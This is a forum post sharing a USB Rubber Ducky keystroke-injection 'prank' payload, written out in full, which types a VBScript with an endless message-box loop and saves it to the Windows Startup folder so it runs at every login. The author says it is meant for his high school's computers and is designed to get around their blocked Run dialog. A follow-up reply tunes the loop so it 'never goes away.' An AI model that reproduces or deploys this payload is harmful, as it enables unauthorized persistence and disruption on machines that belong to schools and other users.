Jump to content

[Payload] Prank Payload: Pop - Ups


Recommended Posts

Generates a vbs file(when its run, it pops up boxes that say whatever was in the quotes) that is then saved in the startup folder, its suggested that you change the text within the quotes, but leave the quotes there.

http://www.iducke.com/Encoder/IDE/4q is the online encoder address, but heres the code:

REM Author: SouahNips

REM description: creates pop ups that state whatever is in the quotes

REM Notes: For use with windows 7 ONLY if you want to use with xp or both, then change "CONTROL ESCAPE"(line 1) to "GUI r" and "STRING NOTEPAD" to "STRING notepad.exe"

REM Reason: the reason i used this form of opening notepad is because I wanted to use this on my highschool's computers and they have run blocked.

CONTROL ESCAPE

DELAY 50

STRING NOTEPAD

DELAY 10

ENTER

DELAY 800

STRING msgbox "Noah"

ENTER

STRING msgbox "Is"

ENTER

STRING msgbox "A"

ENTER

STRING msgbox "Straight"

ENTER

STRING do

ENTER

STRING msgbox "BEAST"

ENTER

STRING loop

DELAY 20

CTRL s

DELAY 200

STRING %userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Runnit1.vbs

DELAY 10

TAB

DELAY 5

DOWN

DOWN

DELAY 5

ENTER

DELAY 5

ENTER

Have fun :)

Edited by SouahNips
Link to comment
Share on other sites

Posted · Hidden by SouahNips, May 1, 2012 - Its wrong -____________________________-
Hidden by SouahNips, May 1, 2012 - Its wrong -____________________________-

Note: instead of having:

ENTER

STRING msgbox "BEAST"

over and over, you can have

ENTER

ENTER

STRING loop

ENTER

STRING msgbox "BEAST"

once and it will never go away. Again, this was an exception made for my school's computer.

Link to comment

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...